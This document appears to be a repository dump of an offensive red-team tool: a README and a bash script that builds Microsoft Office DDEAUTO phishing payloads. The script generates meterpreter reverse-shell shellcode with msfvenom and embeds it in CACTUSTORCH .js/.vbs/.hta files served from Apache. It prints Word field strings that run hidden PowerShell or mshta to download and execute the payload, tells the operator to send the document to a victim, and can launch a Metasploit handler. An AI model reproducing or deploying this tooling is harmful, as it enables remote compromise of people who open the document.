├── README.md └── cactus.sh /README.md: -------------------------------------------------------------------------------- 1 | ## Account moved to: https://gitlab.com/illwill 2 | 3 | 4 | 5 | # CACTUSTORCH_DDEAUTO 6 | OFFICE DDEAUTO payload-generation script: automatically creates a .vbs/.hta/.js payload for use inside a Microsoft Office document. 7 | It generates the DDEAUTO field that downloads and executes your payload via PowerShell or mshta, ready to paste into a Word document. 8 | That field can also be copied from Word to trigger in OneNote, Outlook email, Outlook Calendar or Outlook Tasks. 9 | More info @ http://willgenovese.com/office-ddeauto-attacks/ 10 | Note: intended for authorized security testing only. The script clones the CACTUSTORCH repository from GitHub at run time, runs msfvenom, and stages the generated files in /var/www/html (root privileges needed), so review the fetched code before use and confirm the DDE technique still applies to the target Office version. 11 | Example: 12 | ![DEMO](https://i.imgur.com/GUQgzYk.png) 13 | -------------------------------------------------------------------------------- /cactus.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | internal="$(ip route get 8.8.8.8 | awk '{print $NF;exit}')" 4 | external="$(dig +short myip.opendns.com @resolver1.opendns.com)" 5 | 6 | echo -e "\e[93m ___ _ ___ _____ _ _ ___ _____ ___ ___ ___ _ _ " 7 | echo -e "\e[93m / __| /_\ / __|_ _| | | / __|_ _/ _ \| _ \/ __| || |" 8 | echo -e "\e[33m | (__ / _ \ (__ | | | |_| \__ \ | || (_) | / (__| __ |" 9 | echo -e "\e[91m \___/_/ \_\___| |_| \___/|___/ |_| \___/|_|_\\\\\___|_||_|" 10 | echo -e "\e[96m | \| \| __| /_\| | | |_ _/ _ \ " 11 | echo -e " | |) | |) | _| / _ \ |_| | | || (_) | " 12 | echo -e " |___/|___/|___/_/ \_\___/ |_| \___/ " 13 | echo -e "\t\e[1;93m-= OFFICE DDEAUTO Payload Generation script =-" 14 | echo -e "\t\t\033[1;32mScript Author: illwill (@xillwillx)" 15 | echo -e "\t\033[1;32m CACTUSTORCH Author: Vincent Yiu (@vysecurity)" 16 | echo "" 17 | 18 | echo -e "\e[93mWhich IP you want to use?\e[0m" 19 | options=( 20 | "Internal IP: $internal" 21 | "External IP: $external" 22 | "Manual IP" 23 | ) 24 | select option in "${options[@]}" 25 | do 26 | case "$REPLY" in 27 | 1) 
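echo -e "\e[32m[+]\e[0m Internal IP: $internal was selected."
        # The top-of-file detection takes the LAST field of `ip route get`.
        # On current iproute2 that line ends with "uid N", so $NF is a uid,
        # not an address.  Validate what we got and fall back to the field
        # that follows "src" when it is not a dotted quad.
        if ! [[ "$internal" =~ ^[0-9]{1,3}(\.[0-9]{1,3}){3}$ ]]; then
            internal="$(ip route get 8.8.8.8 2>/dev/null | awk '{for (i=1;i<NF;i++) if ($i=="src") {print $(i+1); exit}}')"
            echo -e "\e[93m[!]\e[0m Re-detected internal IP as: ${internal:-<none>}"
        fi
        if [[ -z "$internal" ]]; then
            echo -e "\e[91m[-]\e[0m Could not determine the internal IP, exiting..."
            exit 1
        fi
        ip="$internal"
        break ;;
    2)  echo -e "\e[32m[+]\e[0m External IP: $external was selected."
        # Resolved via OpenDNS at startup; empty when that lookup failed.
        # The script does not check that this address actually reaches the
        # handler (NAT / port-forwarding is the operator's job).
        if [[ -z "$external" ]]; then
            echo -e "\e[91m[-]\e[0m External IP lookup failed, exiting..."
            exit 1
        fi
        ip="$external"
        break ;;
    3)  echo -e "Enter the IP Manually."
        read -r input
        # The value is spliced into the DDE command text and into the
        # msfconsole -x resource string below, so restrict it to hostname /
        # IPv4 / IPv6 characters and re-prompt on anything else.
        if ! [[ "$input" =~ ^[A-Za-z0-9.:-]+$ ]]; then
            echo -e "\e[91m[-]\e[0m '$input' is not a valid IP address or hostname, try again."
            continue
        fi
        ip="$input"
        echo -e "\e[32m[+]\e[0mManual IP: $ip was selected.\033[0;0m"
        break ;;
    *)  echo "Please select a valid option" ;;
    esac
done

echo ""
echo -e "\e[93mWhich PORT you want to use?\033[0;0m"
options=(
    "4444 (default)"
    "Manual Port"
)
select option in "${options[@]}"
do
    case "$REPLY" in
    1)  echo "Default: 4444"
        port='4444'
        echo -e "\e[32m[+]\e[0mDefault port: $port was entered."
        break ;;
    2)  echo "Enter the port Manually."
        read -r input
        # Plain integer in 1-65535 only; it becomes an msfvenom / msfconsole
        # argument.  10# forces decimal so "08" does not trip arithmetic.
        if ! [[ "$input" =~ ^[0-9]+$ ]] || (( 10#$input < 1 || 10#$input > 65535 )); then
            echo -e "\e[91m[-]\e[0m '$input' is not a valid TCP port (1-65535), try again."
            continue
        fi
        port="$input"
        echo -e "\e[32m[+]\e[0mManual port: $port was entered."
        break ;;
    *)  echo "Please select a valid option" ;;
    esac
done

echo ""
echo -e "\e[32m[?]\e[0mChecking for CACTUSTORCH folder in current directory"
if [ -d "CACTUSTORCH" ] ; then
    echo -e "\e[32m[+]\e[0mCACTUSTORCH folder found."
    cd CACTUSTORCH || { echo -e "\e[91m[-]\e[0mCould not enter the CACTUSTORCH folder, exiting..."; exit 1; }
else
    echo -e "\e[96m[+]\e[0mCACTUSTORCH folder not found, git'ing it"
    # Supply-chain note: this pulls the current tip of a third-party repo and
    # the rest of the script then modifies, serves and (on the target) runs
    # what was fetched.  Pin to a reviewed commit before using this for real.
    # Everything below edits files relative to this directory, so a failed
    # clone/cd must stop the run instead of silently patching the wrong files.
    git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH || { echo -e "\e[91m[-]\e[0mgit clone / cd failed, exiting..."; exit 1; }
fi

echo ""
echo -e "\e[93mWhich payload you want to use?\033[0;0m"
options=(
    "windows/meterpreter/reverse_http"
    "windows/meterpreter/reverse_https"
    "windows/meterpreter/reverse_tcp"
)
select option in "${options[@]}"
do
    case "$REPLY" in
    1)  payload="windows/meterpreter/reverse_http"
        echo -e "\e[32m[+]\e[0m$payload was selected."
        break ;;
    2)  payload="windows/meterpreter/reverse_https"
        echo -e "\e[32m[+]\e[0m$payload was selected."
        break ;;
    3)  payload="windows/meterpreter/reverse_tcp"
        echo -e "\e[32m[+]\e[0m$payload was selected."
        break ;;
    *)  echo "Please select a valid option" ;;
    esac
done

echo ""
echo -e "\e[32m[+]\e[0mCreating meterpreter shellcode with msfvenom"
# Remove any stale payload.bin first: otherwise a failed msfvenom run would be
# masked by the file a previous run left behind and the old shellcode (wrong
# LHOST/LPORT) would be embedded.  Also require a non-empty result.
rm -f payload.bin
if ! msfvenom -p "$payload" LHOST="$ip" LPORT="$port" -f raw -o payload.bin || [ ! -s payload.bin ]; then
    echo -e "\e[96m[-]\e[0mpayload.bin not found, exiting..."
    exit 1
fi
echo -e "\e[32m[+]\e[0mpayload.bin created."

echo -e "\e[32m[+]\e[0mGenerating base64 of payload.bin and injecting into the CACTUSTORCH .vbs/.hta/.js files"
PAYLOAD="$(base64 -w 0 payload.bin)"
# The base64 alphabet (A-Za-z0-9+/=) contains neither the '|' delimiter nor
# '&', so the blob is safe inside the sed replacement; quoting keeps it one
# shell word regardless of size.
sed -i -e 's|var code = ".*|var code = "'"$PAYLOAD"'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'"$PAYLOAD"'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'"$PAYLOAD"'"|g' CACTUSTORCH.hta
# sed exits 0 even when the pattern did not match, so confirm the blob is
# really in each template (upstream may rename the variable).
for tmpl in CACTUSTORCH.js CACTUSTORCH.vbs CACTUSTORCH.hta; do
    if ! grep -qF -- "$PAYLOAD" "$tmpl"; then
        echo -e "\e[91m[!]\e[0m $tmpl does not contain the injected payload; the upstream template may have changed."
    fi
done
echo -e "\e[32m[+]\e[0mFiles edited. copying them to www folder"
# Needs write access to the Apache docroot (normally root).  The DDE commands
# printed below fetch from http://$ip/, so warn loudly if staging failed.
if ! cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta; then
    echo -e "\e[91m[!]\e[0m Could not copy to /var/www/html/ (run as root, or copy the files to your web root manually)."
fi

read -r -p "Do You want to start Apache [y/N] " response
case "$response" in
    [yY][eE][sS]|[yY])
        echo -e "\e[32m[+]\e[0mStarting Apache..."
        service apache2 start
        ;;
    *)
        echo -e "\e[96m[-]\e[0mSkipping Apache..."
        ;;
esac

# The DDE field text is emitted exactly as the original author escaped it;
# it is copied verbatim into Word between the { } of a CTRL+F9 field.
echo -e "\n\n\n\n\e[91mOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\n\e[93mJS PAYLOAD:\e[0m\n\
DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$ip\/CACTUSTORCH.js\',\'index.js\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.js\" >payloads.txt
echo -e "\n\e[93mVBS PAYLOAD:\e[0m\n\
DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$ip\/CACTUSTORCH.vbs\',\'index.vbs\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.vbs\" >>payloads.txt
echo -e "\n\e[93mHTA PAYLOAD:\e[0m\n\
DDEAUTO C:\\\\\Programs\\\\\Microsoft\\\\\Office\\\\\MSword.exe\\\\\..\\\\\..\\\\\..\\\\\..\\\\\windows\\\\\system32\\\\\mshta.exe \"http://$ip/CACTUSTORCH.hta\"" >>payloads.txt
clear
cat payloads.txt && rm payloads.txt
echo ""
read -r -p "Do You want to start meterpreter handler now? [y/N] " response
case "$response" in
    [yY][eE][sS]|[yY])
        echo -e "\e[32m[+]\e[0mStarting Meterpreter Handler..."
        # $ip and $port were restricted to safe character sets above, so they
        # cannot break out of the single-quoted resource commands.
        msfconsole -qx "use exploit/multi/handler;set payload '$payload';set LHOST '$ip';set LPORT '$port'; set ExitOnSession false; set EnableStageEncoding true; exploit -j -z"
        ;;
    *)
        echo -e "\e[96m[-]\e[0mSkipping meterpreter handler..."
        ;;
esac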